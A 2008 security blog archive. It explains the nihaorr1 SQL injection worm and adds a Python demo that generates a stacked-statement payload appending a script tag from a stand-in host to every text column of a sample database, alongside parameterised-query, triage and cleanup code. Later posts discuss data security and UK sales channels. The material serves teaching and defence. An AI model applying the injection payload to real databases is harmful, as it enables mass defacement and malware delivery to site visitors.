Tuesday, 29 April 2008

nihaorr1 attack explained

I went and introduced myself to the guys at Secerno again at InfoSec last week, and whilst I have no professional affiliation with them, I'm always interested in exciting technology which does something new. Steve Moyle, CTO, is a friendly guy who oozes enthusiasm, just as Paul Galwas was when I met him last year. I just got a mail from Steve to tell me about a recent attack, and I thought it was so well explained I offered to reproduce it here. Steve agreed, so here goes:

"The nihaorr1 attack trashed web facing databases all over the planet last week. It was based on an automated SQL Injection attack (Secerno stops these). Previous attacks like this were targeted and individual. It was only a matter of time before someone sinister worked out how to automate it. We were working with a victim not long after the outbreak.

In this attack, they were not stealing data. However, for the affected web sites it would be difficult for anyone claiming PCI compliance to show that they had their data under control. The attack can easily be rewritten to take integer values (e.g. credit card numbers) from one field (say) and copy them to a text field, and then expose them on web pages ...

Basically, the attack worked as follows:

Step 1: potentially vulnerable sites identified automatically (probably by a Google query)

Step 2: SQL Injection part 1. SQL injection at a site to ask the database for every field it has that contains text

Step 3: SQL Injection part 2. Update every text item in the database with the original item plus a link that will download a trojan to the web browser

Now what happens is that when a web site serves up a page, the text it serves up is called up from its database -- but every piece of text now has a malicious link under it. When clicked on, the link serves up a virus that infects the viewer of the web page.

Note that the original victim -- the web site -- has become the attacker. Whilst the new victim is the website visitor who trusts the site.

This attack will be adapted and will cause real chaos."

Thanks Steve for the entertaining story and explanation of how this attack is working. And, as the Romans say, caveat emptor internettus.
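The three steps Steve lays out, worked through as an added example that is not from the original post and not Secerno's or anyone else's code. A constructed in-memory SQLite database stands in for the site's database, the appended script tag and its host name are hypothetical, and the driver call that accepts stacked statements (executescript) stands in for the database driver the worm relied on. The same schema walk the worm used to find text columns (on the real targets it did this inside the injected SQL) is reused here on the defender's side: first to count how many rows in each text column carry the marker, then to strip the exact appended string. The parameterised lookup sits beside the concatenated one to show why the injection goes nowhere once the id travels as data.

```python
import sqlite3

# Constructed marker for the demo. The real worm appended a <script src=...>
# tag pointing at its own domain; the host name below is hypothetical.
INJECTED = '<script src="http://malicious.example/x.js"></script>'

TEXT_TYPES = ("TEXT", "VARCHAR", "NVARCHAR", "CHAR", "NCHAR")


def build_sample_db():
    """Constructed sample schema standing in for a site's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT,
                               description TEXT, price INTEGER);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget', 100);
        INSERT INTO products VALUES (2, 'Gadget', 'A shiny gadget', 250);
        INSERT INTO comments VALUES (1, 'alice', 'Great shop');
    """)
    return conn


def text_columns(conn):
    """Step 2: every (table, column) whose declared type is a text type.
    The worm did this inside its injected SQL; the defender reuses the
    same walk for triage and cleanup."""
    cols = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_rest in conn.execute(
                f'PRAGMA table_info("{table}")').fetchall():
            if ctype.upper() in TEXT_TYPES:
                cols.append((table, col))
    return cols


def worm_payload(conn):
    """Step 3: the statements stacked after the injected ';' so that every
    text value becomes itself plus the script tag. Generated client-side
    because SQLite has no server-side cursor to loop over the schema."""
    return "; ".join(
        f"""UPDATE "{t}" SET "{c}" = "{c}" || '{INJECTED}'"""
        for t, c in text_columns(conn)
    )


def vulnerable_lookup(conn, product_id):
    """The hole: user input concatenated into SQL and run by a driver that
    accepts stacked statements (executescript stands in for that driver)."""
    conn.executescript("SELECT * FROM products WHERE id = " + product_id)


def safe_lookup(conn, product_id):
    """Parameterised query: the id travels as data, so '1; UPDATE ...' is
    just a string that matches no row."""
    return conn.execute(
        "SELECT * FROM products WHERE id = ?", (product_id,)).fetchall()


def find_infected(conn, marker="<script"):
    """Triage: for each text column, count rows carrying the marker."""
    hits = []
    for t, c in text_columns(conn):
        n = conn.execute(
            f'SELECT COUNT(*) FROM "{t}" WHERE "{c}" LIKE ?',
            ("%" + marker + "%",)).fetchone()[0]
        if n:
            hits.append((t, c, n))
    return hits


def strip_payload(conn, payload=INJECTED):
    """Cleanup for the exact appended string; returns what is still infected.
    A real incident still calls for a restore from a known-good backup and
    a fix to the application, since the appended text varied."""
    for t, c in text_columns(conn):
        conn.execute(
            f'UPDATE "{t}" SET "{c}" = REPLACE("{c}", ?, ?)', (payload, ""))
    conn.commit()
    return find_infected(conn)


if __name__ == "__main__":
    db = build_sample_db()
    vulnerable_lookup(db, "1; " + worm_payload(db))
    print("infected:", find_infected(db))
    print("after cleanup:", strip_payload(db))
```

Run as a script it infects the constructed database through the concatenated query, reports every text column that was hit, then strips the payload. The count-per-column report is the useful part of the triage: a column with a hit in every row is exactly what Steve's step 3 produces, and it is the signal that the root cause is a stacked-statement injection rather than a single tampered record.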

The road ahead

With user security, CIA (or AAA as it becomes) is fully integrated. This is an area of security which has been around since computers were first invented, to some degree. It is the most mature of the 3 areas I have picked out in my series of posts so far. [Although please note, these are only picked out for sake of ease, in reality there are overlaps.] Network security is less integrated, although in my career I have watched as point solutions in the network have become more fully integrated. Network devices at least all talk the same language to each other now, TCP/IP as a standard form of communication has kind of settled in.

With data we are not quite so fortunate: C, I and A are not integrated, although the large storage companies are trying. There are a few of these, though, and each has its own standards.

In my original piece I said that integrity was the future of data security, and indeed, it will be an important part of every piece of storage eventually, when everyone realises its importance - but that's not a great starting position. I don't think it will be a point solution that becomes part of a data security standard. Integrity will always be an option, along with encryption and compression as the whole data centric security space merges and evolves.

This will happen separately from hardware as well as being built in to it. But will the standards emerge from the hardware, or something distinct and separate from the hardware that the information resides on?

Data-centric security has to be able to move with the data. Anything that the large storage companies try to apply directly into hardware will be difficult to use at best, more likely ignored. We've already seen a big pull and push between Sun, IBM, etc. in trying to standardise key management. If they can't even agree on that, where keys are already in reasonably standard formats, what chance do they have on agreeing on compression, encryption and integrity standards? It is more likely they will pick up and use existing popular methods over time as happened in the network.

I don't want this to become too much of an advert, but I spoke recently about PKWare, because I am interested in them, and will be visiting them this week. I'm going to talk with them about their products in more detail, but they sound very close to my heart, and as close to the reality of reaching my data security nirvana that I've actually seen. What's more, it makes sense.

I've heard some very interesting things about them recently, their new SecureZIP line, and PartnerLink are both areas I identified as being massive opportunities for growth whilst at my previous job. I actually asked our engineers about designing a product almost identical to PartnerLink, but it was too much for our small team. We didn't have the resources to develop the ideas, but now I find those ideas already exist.

Ask anyone (as I did at InfoSec) whether they've heard of PKWare and they will often look blank, until you say "have you ever used PKZIP?", which of course everyone has at some point, if they've used a computer for anything other than emails. I'll be asking some more searching questions this week and reporting back in due course.

Monday, 28 April 2008

Nearly there...

I've just finished writing my final post in the series of 'data nirvana' posts - you can read it here tomorrow - and taken a quick look back through the other blogs I enjoy to find Rich talking about data classification being dead. I have to agree. I started writing about this last year and even ranted at someone else about not understanding it properly (which I won't dig up again).

Data classification is the real data nirvana of course, but it really can't be achieved satisfactorily. To echo Mr. Mogull for a moment, a network is a dynamic thing, it's constantly being updated with information, which can change its status from Top Secret to Private, or Public to Classified in a stroke. Tags just don't cut it. A company I spoke to at length last year proposes a data classification solution. They haven't pushed it as such yet because the market isn't there. A few tyre kickers have had a go, not because they want to classify their data, but because they want to find it. That's a totally different matter. De-duplication is a very good idea, and simple, and sellable. Data classification is a great idea, but complex and completely un-sellable to anyone except me and Rich. [If you manage to invent it, please drop us a line.]

The only way you could manage to classify a system is to close it: make it read-only, or take it off-line as Rich also talks about. That kind of makes technology about as useful as your local library, though, and sends us crashing back into the 20th century just as everyone is getting used to the 21st. Something I find much more interesting is the idea of controlling information from a central hub, with policies in place around it - information sharing. It's more of a 'real world' example of how people are likely to use data security.

It reduces the need for classification as you only have to choose policies around the data you are making available outside your network. I also talked about this last year, as Microsoft released their SISA idea with about 10 other companies involved. This is clearly a good idea, but with so many technologies involved, bound for disaster. I don't know if anyone got anywhere close to deploying this, but I rather think not.

So Information Sharing is my new proxy-nirvana, or pseudo-nirvana, that is, the thing that will sell and be used, and is actually practical and possible. And guess what, I just happen to have written something about it in my post tomorrow... read on.

It's not in the network

Everyone's bored of network security aren't they? I certainly haven't thought much about it recently. There are a few reasonable sized companies out there doing very well from network devices, by which I mean devices which control the network traffic in some way, not just sit on the network, analysing this or that, controlling something or providing a secure store for something else.

Back in the year dot of the internet, Cisco made it big from connecting everyone together. At the same time Microsoft made it easy to use a computer, and the internet boom started to have some knock on effects. Suddenly hundreds, thousands and eventually millions of people were connected to each other with little more than an open pipe to each other which could be stopped, stolen or even hijacked.

Corporations understood the need for computer communication between them, it's almost a given these days that you need a computer in business to survive, but security was nowhere near top of their minds.

So a few scary years later, antivirus and then firewall products started to appear. This gave Mr. Corporation a feeling of safety, the bad guys were outside the network, the network was self-cleaning, and the good guys were inside, just like in a normal, physical-world company. The amount of headline space given to firewalls and AV around the beginning of the 90s is, in my humble opinion, the main reason why security is now so difficult to teach and sell. Up until fairly recently, you mentioned IT security to a CEO and he would answer 'we have a firewall already'.

After firewalls came IDS then IPS/IDP, to stop live nasties getting in, undetected by AV, largely because they weren't viruses, or were zero-day attacks, the AV as yet unaware of their signature. Then came VPNs, proxies, reverse proxies, SSL termination points, load balancers, link controllers, etc. To analyse every product would take another 3 weeks, and would not add to this post.

The market was flooded with all manner of devices in the mid to late 90s, and the messaging was hard to follow. This market evolved relatively slowly (compared to the internet boom) and only in recent times have we been able to pick the parts which make sense to use in the network, drop those that don't and turn them into what we are now calling UTM - Unified Threat Management.

UTM is a much better solution to network security issues, but it doesn't cover everything. You still need to have separate user security for example. User security is also still evolving into identity management and identity based access management. Security will never be perfect, so this process will always continue in ever decreasing forward steps. Certainly for now, I'm done with network security. Data security is much more interesting, and that's where I'll continue tomorrow.

Sunday, 27 April 2008

Continuing the search for data nirvana

It's a while since I wrote about data integrity (actually, I wrote about it a couple of days ago, but not in detail). I will assume that everyone is familiar with the CIA triad before reading on. [If not, please look it up.]

Last year I wrote a couple of pieces which talked about the security of transactions, addressing the user, the network and the data. It was part of a presentation I used in Barcelona to persuade some VCs to invest in Kinamik, who I was then with. I certainly thought it was along the right lines then, and I still think it's relevant, although I need to update the ideas.

Here's a copy of the table I referred to as my Transaction Security table:

Transaction | Availability             | Confidentiality      | Integrity
User        | Access Controls          | Authorisation        | Authentication
Network     | Wireless, Load balancers | Firewalls, IPS, etc. | Anti-Virus, Change Control Mechanisms, Digital Signatures
Data        | Access Controls          | Encryption           | Digital Signatures

Most people involved in using IT of any kind will be familiar with authentication, entering usernames and passwords. Most of us will do this many times a day in fact. We need to do this to make sure we are who we say we are, to prove our integrity. We need to be authorised to continue our journey in the network, to allow us into the areas we are permitted to view and use. The confidentiality of the network and data is at stake if authorisation is not in place. The network and data therefore need access controls, to stop unauthorised access or permit authorised access; this is availability.

I've spent a little time and space explaining this because it's not always obvious. Even if we work in a network environment, we don't often see user security, it is built in to applications, operating systems and devices. It is an integral part of being in the network, just as our identities are an integral part of us. User security needs to be like this, or we wouldn't want to use the technology.

OK, maybe this is too simple. I'll let you look at the network security parts for yourselves for the moment. The network is how we travel to the data, as users, so the concepts of C, I and A here are largely intuitive, much as we picture things on a network diagram. Tomorrow I'm going to continue with the network, then wrap up with the search for data nirvana so temptingly promised by the title.

How do you solve a problem like EMEA?

If you were at InfoSec this week you will have noticed a few of the larger stands. For me, seeing companies like Juniper and F5 filling the show floor is comforting in some ways, but in others it indicates where there is work to be done.

If I were the CEO of a tech company looking at the successes of these guys I might think: "The way to tackle EMEA is to put in an office near London, staff it with sales guys and flood the market." Indeed, that is a tried and tested method, but not very successful. I mention these 2 companies specifically because I was lucky enough to work with them both when working in pre-sales at Equip Technology, their UK distributor, a couple of years back.

Juniper of course built their success on their NetScreen firewall, and the reason for that success was its simplicity of administration. It sold in lorry-loads and was easily supported by the channel. I know probably 15-20 engineers who are qualified to support Juniper products, and as the company has grown, so has their product arsenal, their training capabilities, and their worth. I think they have a great model for the channel, which was the result of a lot of hard work, but not inconsiderable luck. They hit the market at the right time, and the product was simple enough to keep going locally.

F5 built their success on the fabulous BigIP and the family of products that can reside on one, the LTM, GTM, ATM, Link Controller and probably loads of others by now. When I left the channel they had just bought 4 new companies to fill their portfolio. I was a big fan, simply because they made the GUIs easy for administrators to understand and explain to others. The boxes usually worked and there were few things not possible with the help of iRules and iControls. Success here was down to the need to monitor and re-use infrastructure internally without messing too much with the front end. A bit more complex than the firewall, but easy to explain and justify the costs, this was a sales success more than a technical success, but sales success forces the technical side to keep up. As can be seen from the Juniper example above, the guys who put the work in are now very valuable engineers.

The sales for these pieces of kit were much fewer than with Juniper, but often much much larger. The last deal I was involved in for F5 kit was quoted at over £350k, for a number of devices. The margin on a deal like that is not inconsiderable, when you weigh up the fact that distributors are typically looking for 40% when they take on a new vendor.

So where does that leave everyone else? What about very technical products, or products where sales cycles are long and boxes aren't just shifted along like these guys have managed to achieve? If you've done the sales job in the US, the market doesn't automatically pick up on it over here. In fact, the whole sales job has to be done again, regardless of early adopters and good press. Relying on the channel is still possible, but without regular sales the salesmen soon get frustrated, and the technical guys forget what they have learned. For very technical products, encryption being my experience, this creates a problem which has to be managed very closely. Sales and technical people representing the vendor have to be available to go onsite on a weekly basis, just to keep the product in the minds of those pushing it out there.

This is hard to achieve from San Francisco, so very often an RSM is hired in the UK, they are of course given targets, usually unrealistic ones. They do not have technical skills, so an SE is hired, of variable quality. These 2 have to sell direct AND sell through the channel, 2 very different jobs which can spread them both too thinly, even if they are in constant communication. It is also very stressful, and involves a huge amount of travel, whether you feel like it or not, and whether it gains you anything or not. Selling direct for these long cycles is nerve racking and a thankless task, especially when it fails. However, if you hire someone to just cover the channel, what are they going to do for the other 3 days a week you are employing them?

At SecurEMEA we are helping technical companies address this gap cheaply and efficiently. Communication is key to our survival and success. Once we have helped develop a successful channel to market for a technology, we then aim to help build that company until it can stand on its own in the region. Maybe then you'll see a few more highly technical vendors on stands at InfoSec in the coming years.

Friday, 25 April 2008

I'm limited, it's official

As of today I am now operational as a Limited Company in the UK. Robert Newby & Associates (RNA) now has a bank account and a registered trading number. So that means you can hire me as a consultant, and my associates of course.

SecurEMEA is still growing, and thanks to Rich Mogull's little podcast with me at RSA, I've been inundated with requests for help. It soon became clear to me talking to people about this that this is not going to be a quick process however, and rightly so. By the very nature of what I am offering to clients in the UK, there is a lot of checking, double checking and hesitation to move forwards.

SecurEMEA is being set up to help bring companies into the UK, to address the channel here, and then growth into the wider European market. I'm going to stick my neck out here and say that the majority of US IT security vendors (successful or otherwise) do not know the UK channel to market very well. There are many who haven't even tried, but there are also a brave few who have. Out of these brave few, there are a smaller percentage still who have succeeded.

One company I heard of recently, and who will always remain nameless in my presence, spent 2 years and $3 million pushing a team of 15 people into the UK, thinking they had a great product, and indeed they did. After 2 years, they realised that sales were flatlining, and had to set about chopping the staff back down. This cost more $$$, and took time they didn't have. Then the process of building the company here had to start again. Ouch.

Many companies do it cheaply now. I was fortunate to work for Vormetric over here 4 years ago, there was 1 RSM, and me with my spanners. Later a UK sales guy joined and sales dived, so the UK operation became too expensive to maintain at that time. They are going to have a much better year this year, mark my words. Ingrian did the same, 1 RSM, me with a spanner set, and a UK sales guy. They were luckier, and managed to be acquired, but not for a huge hill of beans, and no-one made much out of it. SafeNet will probably not do much with the technology this year in my opinion.

All of this costs money, and as can be seen, is not guaranteed to be successful. An RSM costs $100-150k a year, an SE $100-150k a year, and extra sales guys, the same again. IF they make a sale, then they pay for themselves, but not the offices, infrastructure, etc. And you can't guarantee you're getting good sales guys. And you can't manage them effectively from 5000 miles away. So, this is still cheap is it?

SecurEMEA is based on the premise that I've done it before, and know what mistakes not to make again. I know what sales guys to work with, and who to avoid like the plague (you know who you are!) I know which distributors work well with tricky technologies, and which resellers are more than box shifters. Initially I am planning to do this fairly intensely with a couple of companies only, but in time I would like this to be THE place that people come to break into the UK market.

So, you can see that the people who will be most aware of the benefit that SecurEMEA can bring will be companies who have already tried and been burnt to some degree. Those who haven't tried might be persuaded that they can do without, and indeed, it is possible, especially with products that have a very long sales cycle.

If you can't afford to wait that long, or spend that much cash however, why not drop me a line?
